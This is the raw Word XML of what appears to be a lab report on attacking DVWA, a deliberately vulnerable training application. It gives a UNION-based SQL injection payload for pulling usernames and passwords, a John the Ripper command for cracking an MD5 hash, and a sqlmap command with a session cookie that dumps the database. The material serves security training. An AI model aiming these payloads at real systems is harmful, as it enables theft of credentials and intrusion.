        <w:t xml:space="preserve">0' union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B7D97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B7D97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B7D97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dvwa.users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B7D97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783C9B67" w14:textId="77777777" w:rsidR="009B7D97" w:rsidRPr="009B7D97" w:rsidRDefault="009B7D97">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206A738A" w14:textId="4326D72B" w:rsidR="0097152C" w:rsidRDefault="0097152C">
      <w:r w:rsidRPr="0097152C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44195E4B" wp14:editId="71F75E77">
            <wp:extent cx="5731510" cy="4484370"/>
            <wp:effectExtent l="152400" t="152400" r="345440" b="335280"/>
            <wp:docPr id="195315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52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EFBB2" w14:textId="77777777" w:rsidR="0097152C" w:rsidRDefault="0097152C"/>
    <w:p w14:paraId="2FB1C0CE" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="655A8E80" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="19BF2B8E" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="702AED5D" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="049957E9" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="44F6E884" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="53805465" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="1503D862" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="057605D1" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="627F4026" w14:textId="71795320" w:rsidR="00A202BC" w:rsidRPr="00A202BC" w:rsidRDefault="00A202BC" w:rsidP="00CA051B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>JOHN THE RIPPER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D98C0F3" w14:textId="7886B29E" w:rsidR="00CA051B" w:rsidRPr="00CA051B" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA051B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Commands Used in Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C856941" w14:textId="46830581" w:rsidR="00CA051B" w:rsidRPr="00CA051B" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA051B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>echo e99a18c428cb38d5f260853678922e03 &gt; /home/kali/Desktop/pass.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC019E7" w14:textId="0523B929" w:rsidR="00CA051B" w:rsidRPr="00CA051B" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA051B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>john pass.txt --format=raw-MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169B03C4" w14:textId="45D75E87" w:rsidR="00C21923" w:rsidRDefault="0097152C">
      <w:r w:rsidRPr="0097152C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72522D9E" wp14:editId="72EE7DFE">
            <wp:extent cx="5731510" cy="509270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81867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79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52C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77A8A07C" wp14:editId="622C8892">
            <wp:extent cx="5731510" cy="1778000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9859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7390" w14:textId="301BD065" w:rsidR="0097152C" w:rsidRDefault="0097152C">
      <w:r w:rsidRPr="0097152C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36168856" wp14:editId="35814C3A">
            <wp:extent cx="5731510" cy="2080895"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="134254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69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F04D" w14:textId="77777777" w:rsidR="00A202BC" w:rsidRDefault="00A202BC"/>
    <w:p w14:paraId="240CB1E3" w14:textId="77777777" w:rsidR="00A202BC" w:rsidRDefault="00A202BC"/>
    <w:p w14:paraId="2B300716" w14:textId="77777777" w:rsidR="00A202BC" w:rsidRDefault="00A202BC"/>
    <w:p w14:paraId="6C9F4A97" w14:textId="77777777" w:rsidR="00A202BC" w:rsidRDefault="00A202BC"/>
    <w:p w14:paraId="594EEB8F" w14:textId="77777777" w:rsidR="00A202BC" w:rsidRDefault="00A202BC"/>
    <w:p w14:paraId="4467C783" w14:textId="77777777" w:rsidR="00A202BC" w:rsidRDefault="00A202BC"/>
    <w:p w14:paraId="78C967A2" w14:textId="77777777" w:rsidR="00A202BC" w:rsidRDefault="00A202BC"/>
    <w:p w14:paraId="603C75A9" w14:textId="77777777" w:rsidR="00A202BC" w:rsidRDefault="00A202BC"/>
    <w:p w14:paraId="23BC7475" w14:textId="77777777" w:rsidR="00A202BC" w:rsidRDefault="00A202BC"/>
    <w:p w14:paraId="6A7CB275" w14:textId="77777777" w:rsidR="00A202BC" w:rsidRDefault="00A202BC"/>
    <w:p w14:paraId="2425FC02" w14:textId="3F444124" w:rsidR="00A202BC" w:rsidRPr="00A202BC" w:rsidRDefault="00A202BC" w:rsidP="00B73D56">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQL MAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BD59B2" w14:textId="5C4A407C" w:rsidR="00A202BC" w:rsidRDefault="00A202BC">
      <w:r w:rsidRPr="00A202BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0867266B" wp14:editId="2C2082D5">
            <wp:extent cx="5731510" cy="3114040"/>
            <wp:effectExtent l="152400" t="152400" r="345440" b="334010"/>
            <wp:docPr id="9978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2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DF66A" w14:textId="57FA9472" w:rsidR="00563267" w:rsidRPr="00563267" w:rsidRDefault="00563267" w:rsidP="00563267">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA051B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Commands Used in Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4880B2" w14:textId="280F856A" w:rsidR="00FD7182" w:rsidRPr="00563267" w:rsidRDefault="00FD7182">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00563267">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00563267">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00563267">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00563267">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "http://192.168.226.131/dvwa/vulnerabilities/sqli/?id=2&amp;Submit=Submit" --cookie="PHPSESSID=d7f198751e14357f2a31ac2ed07ce788,security=low" --all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D9AEFA" w14:textId="77777777" w:rsidR="00FD7182" w:rsidRDefault="00FD7182"/>
    <w:p w14:paraId="0BE781E9" w14:textId="4CC69B81" w:rsidR="00A202BC" w:rsidRDefault="00B73D56">
      <w:r w:rsidRPr="00B73D56">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FF70923" wp14:editId="3D72142B">
            <wp:extent cx="5731510" cy="2400935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2969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37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4823" w14:textId="77777777" w:rsidR="00A202BC" w:rsidRDefault="00A202BC"/>
    <w:p w14:paraId="1E0687C3" w14:textId="77777777" w:rsidR="00A202BC" w:rsidRDefault="00A202BC"/>
    <w:p w14:paraId="51435A4C" w14:textId="77777777" w:rsidR="00A202BC" w:rsidRDefault="00A202BC"/>
    <w:p w14:paraId="25C2F286" w14:textId="77777777" w:rsidR="00A202BC" w:rsidRDefault="00A202BC"/>
    <w:sectPr w:rsidR="00A20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152C"/>
    <w:rsid w:val="00053866"/>
    <w:rsid w:val="00141F00"/>
    <w:rsid w:val="001D1906"/>
    <w:rsid w:val="001E3837"/>
    <w:rsid w:val="00203464"/>
    <w:rsid w:val="00325EEA"/>
    <w:rsid w:val="003652F5"/>
    <w:rsid w:val="003C577C"/>
    <w:rsid w:val="0055430E"/>
    <w:rsid w:val="00563267"/>
    <w:rsid w:val="00610C6B"/>
    <w:rsid w:val="00756BA0"/>
    <w:rsid w:val="007A6B6F"/>
    <w:rsid w:val="007E7966"/>
    <w:rsid w:val="00822186"/>
    <w:rsid w:val="00932EDB"/>
    <w:rsid w:val="0097152C"/>
    <w:rsid w:val="009B7D97"/>
    <w:rsid w:val="00A202BC"/>
    <w:rsid w:val="00B73D56"/>
    <w:rsid w:val="00C21923"/>
    <w:rsid w:val="00CA051B"/>
    <w:rsid w:val="00D47B6A"/>
    <w:rsid w:val="00DE7338"/>
    <w:rsid w:val="00E6498B"/>
    <w:rsid w:val="00F011FB"/>
    <w:rsid w:val="00F4343D"/>
    <w:rsid w:val="00F67576"/>
    <w:rsid w:val="00FD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03AFB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C15721BF-44E0-423F-8FEB-D4170DCC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2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12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26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-19T23:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-18T11:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>